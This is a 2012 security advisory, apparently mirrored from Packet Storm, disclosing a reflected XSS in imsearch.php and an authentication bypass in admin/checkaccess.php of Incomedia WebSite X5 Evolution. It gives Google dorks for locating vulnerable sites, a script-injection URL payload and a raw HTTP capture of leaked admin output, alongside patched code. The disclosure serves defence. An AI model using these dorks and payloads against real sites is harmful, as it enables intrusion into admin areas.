Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormAkastepPACKETSTORM:118367
HistoryNov 26, 2012 - 12:00 a.m.

Incomedia WebSite X5 Evolution 9.0.4.1748 XSS / Bypass

2012-11-2600:00:00
Akastep
packetstormsecurity.com
371
JSON
`=========================================  
Vulnerable Software: Incomedia WebSite X5 Evolution <= 9.0.4.1748 (All versions)  
Vendor: www.websitex5.com  
Vulns: XSS && Auth Bypass  
Software License: Commercial  
Dork 1: inurl:imsearch.php  
Dork 2: intitle:WebSite X5 Manager inurl:/admin/header.php  
=========================================  
  
  
About Software:  
==========================================  
WebSite X5 Evolution 9 is the most versatile and complete solution you'll find  
for creating eye-catching, functional and professional websites, blogs and  
online stores.  
  
You'll be surprised at how easy WebSite X5 Evolution 9 is to use, but what is  
perhaps most amazing is the sheer power and totality of the features it offers.  
  
http://www.websitex5.com/en/evolution-9.html  
  
*Nice Software and easy to use.*  
==========================================  
  
About Vulnerabilities:  
  
  
  
[*] XSS: [*]  
site.tld/imsearch.php?search="\><script>alert(1);</script>  
  
  
  
Fix:  
  
Open imsearch.php and find:  
  
=============VULNERABLE CODE==============  
  
<?php  
$search = new imSearch();  
$search->search(@$_GET['search'], @$_GET['page']);  
?>  
  
  
==========END OF VULNERABLE CODE==========  
  
  
  
REPLACE WITH:  
  
  
==============FIXED CODE====================  
  
<?php  
$search = new imSearch();  
$search->search(@htmlspecialchars($_GET['search']), htmlspecialchars(@$_GET['page']));  
?>  
  
===========END OF FIXED CODE================  
  
  
  
  
[*] Second vulnerability is Authentication Bypass. [*]  
  
  
  
  
Vulnerable code: site.tld/admin/checkaccess.php  
  
========= BEGIN VULNERABLE CODE ===========  
  
  
<?php  
require_once("../res/x5engine.php");  
$login = new imPrivateArea();  
if ($login->checkAccess("admin/" . basename($_SERVER['PHP_SELF'])) !== 0) {  
if (basename($_SERVER['HTTP_REFERER']) == "login.php")  
header("Location: login.php?error");  
else  
header("Location: login.php");  
}  
else  
$logged = TRUE;  
  
// End of file checkaccess.php  
  
==========END OF VULNERABLE CODE==========  
  
  
Notice flaw: Script continues execution.  
  
  
  
For reproduce:  
===============================================  
  
Using Fiddler intercept the traffic from your browser and you will get output from scripts execution.  
Print screen:  
http://oi47.tinypic.com/f21sf7.jpg  
  
==================== RAW=======================  
HTTP/1.1 302 Found  
Date: Sun, 25 Nov 2012 01:13:19 GMT  
Server: Apache  
Set-Cookie: ASPX=pfsnkn5ccps9u15pa0r4of6lodesg6lq; path=/  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0  
Pragma: no-cache  
Location: login.php  
Content-Length: 1188  
Keep-Alive: timeout=5, max=100  
Connection: Keep-Alive  
Content-Type: text/html  
  
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">  
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it" lang="it" dir="ltr">  
<head>  
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />  
<meta http-equiv="Content-Language" content="it" />  
<meta http-equiv="Content-Type-Script" content="text/javascript" />  
<meta http-equiv="ImageToolbar" content="False" />  
<meta name="MSSmartTagsPreventParsing" content="True" />  
<script type="text/javascript" src="../res/jquery.js"></script>  
<script type="text/javascript" src="../res/x5engine.js"></script>  
<link rel="stylesheet" type="text/css" href="template.css" media="screen" />  
<title>WebSite X5 Manager</title>  
</head>  
<body>  
<div id="imAdminPage">  
<div id="imBody">  
<div class="imSectionTitle"></div>  
<div class="imContent">  
<div class="imTest pass">Версия PHP: 5.2.17<span>PASS</span></div>  
<div class="imTest pass">Поддержка сессии<span>PASS</span></div>  
<div class="imTest pass">Путь к публичной папке на сервере<span>PASS</span></div>  
</div>  
</div>  
</div>  
</body>  
  
  
===============EOF RAW==================  
  
  
  
If your checkaccess.php isn't patched every file on /admin/*.php is vulnerable.  
  
  
  
  
  
Fixed Code:  
site.tld/admin/checkaccess.php  
  
==============BEGIN =FIXED CODE=================  
<?php  
require_once("../res/x5engine.php");  
$login = new imPrivateArea();  
if ($login->checkAccess("admin/" . basename($_SERVER['PHP_SELF'])) !== 0)  
{  
if (basename($_SERVER['HTTP_REFERER']) == "login.php")  
{  
header("Location: login.php?error");  
exit;  
}  
  
else  
{  
header("Location: login.php");  
exit;  
}  
}  
else  
{  
$logged = TRUE;  
}  
  
// End of file checkaccess.php  
  
===============END OF FIXED CODE================  
  
  
**Vendor notified about this advisory.**  
  
  
================================================  
SHOUTZ+RESPECTS+GREAT THANKS TO ALL MY FRIENDS:  
================================================  
packetstormsecurity.org  
packetstormsecurity.com  
packetstormsecurity.net  
securityfocus.com  
cxsecurity.com  
security.nnov.ru  
securtiyvulns.com  
securitylab.ru  
secunia.com  
securityhome.eu  
exploitsdownload.com  
exploit-db.com  
osvdb.com  
websecurity.com.ua  
  
to all Aa Team + to all Azerbaijan Black HatZ  
+ *Especially to my bro CAMOUFL4G3 *  
To All Turkish Hackers  
  
Also special thanks to: ottoman38 & HERO_AZE  
================================================  
  
/AkaStep  
`
JSON